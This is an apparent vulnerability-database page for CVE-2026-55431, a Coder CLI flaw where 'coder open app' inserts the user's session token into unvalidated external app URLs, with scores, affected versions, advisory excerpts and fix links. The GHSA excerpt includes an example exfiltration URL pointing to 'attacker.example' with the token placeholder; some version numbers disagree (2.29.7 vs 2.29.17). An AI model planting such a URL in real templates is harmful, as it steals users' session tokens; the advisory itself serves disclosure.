CVE-2026-55431
published 2026-07-08CVE-2026-55431: Coder allows organizations to provision remote development environments via Terraform. Prior to versions 2.29.7, 2.32.7, 2.33.8, and 2.34.2, `coder open app`…
PriorityP430medium6.1CVSS 3.1
AVNACLPRNUIRSCCLILAN
EPSS
0.34%
27.1th percentile
Coder allows organizations to provision remote development environments via Terraform. Prior to versions 2.29.7, 2.32.7, 2.33.8, and 2.34.2, `coder open app` opens external workspace-app URLs without validating the scheme or host. When an external app URL contains the `$SESSION_TOKEN` placeholder the CLI replaces it with the user's real session token before handing the URL to the OS open handler. Practical exploitation requires the victim to run `coder open app` against a workspace whose external app definition the attacker controls. Only a malicious template author can control external app URLs. The fix in versions 2.29.7, 2.32.7, 2.33.8, and 2.34.2 applies a URL-scheme allowlist in the CLI and limits `$SESSION_TOKEN` substitution to trusted destinations like the web frontend. As a workaround, avoid running `coder open app` for untrusted workspaces.
Affected
11 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| coder | coder | < 2.29.17 | 2.29.17 |
| coder | coder | — | — |
| coder | coder | — | — |
| coder | coder | — | — |
| coder | coder | >= 2.30.0 < 2.32.7 | 2.32.7 |
| coder | coder | >= 2.33.0 < 2.33.8 | 2.33.8 |
| coder | coder | >= 2.34.0 < 2.34.2 | 2.34.2 |
| github.com | coder_coder_v2 | >= 0 < 2.29.17 | 2.29.17 |
| github.com | coder_coder_v2 | >= 2.30.0 < 2.32.7 | 2.32.7 |
| github.com | coder_coder_v2 | >= 2.33.0 < 2.33.8 | 2.33.8 |
| github.com | coder_coder_v2 | >= 2.34.0 < 2.34.2 | 2.34.2 |
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
VulDB
Coder up to 2.29.16/2.32.6/2.33.7/2.34.1 Template privilege escalation
vuldb·2026-07-08·CVSS 7.7
CVE-2026-55431 [HIGH] Coder up to 2.29.16/2.32.6/2.33.7/2.34.1 Template privilege escalation
A vulnerability described as problematic has been identified in Coder up to 2.29.16/2.32.6/2.33.7/2.34.1. This affects an unknown part of the component Template Handler. The manipulation results in privilege escalation.
This vulnerability is reported as CVE-2026-55431. The attacker must have access to the local network to execute the attack. No exploit exists.
GHSA
Coder's session token leaked to arbitrary hosts via `coder open app` for external workspace apps
ghsa·2026-07-06
CVE-2026-55431 [HIGH] CWE-522 Coder's session token leaked to arbitrary hosts via `coder open app` for external workspace apps
Coder's session token leaked to arbitrary hosts via `coder open app` for external workspace apps
### Summary
`coder open app` opens external workspace-app URLs without validating the scheme or host. When an external app URL contains the `$SESSION_TOKEN` placeholder the CLI replaces it with the user's real session token before handing the URL to the OS open handler.
> **Note:** Practical exploitation requires the victim to run `coder open app` against a workspace whose external app definition the attacker controls. Only a malicious template author can control external app URLs.
### Impact
Workspace code can register external apps with arbitrary URLs so an attacker who controls workspace contents can define a URL like `https://attacker.example/?t=$SESSION_TOKEN`. Running `coder open app
No detection rules found.
No public exploits indexed.
No writeups or analysis indexed.
https://github.com/coder/coder/pull/26146https://github.com/coder/coder/releases/tag/v2.29.17https://github.com/coder/coder/releases/tag/v2.32.7https://github.com/coder/coder/releases/tag/v2.33.8https://github.com/coder/coder/releases/tag/v2.34.2https://github.com/coder/coder/security/advisories/GHSA-v54h-cp2w-9x4g
2026-07-08
Published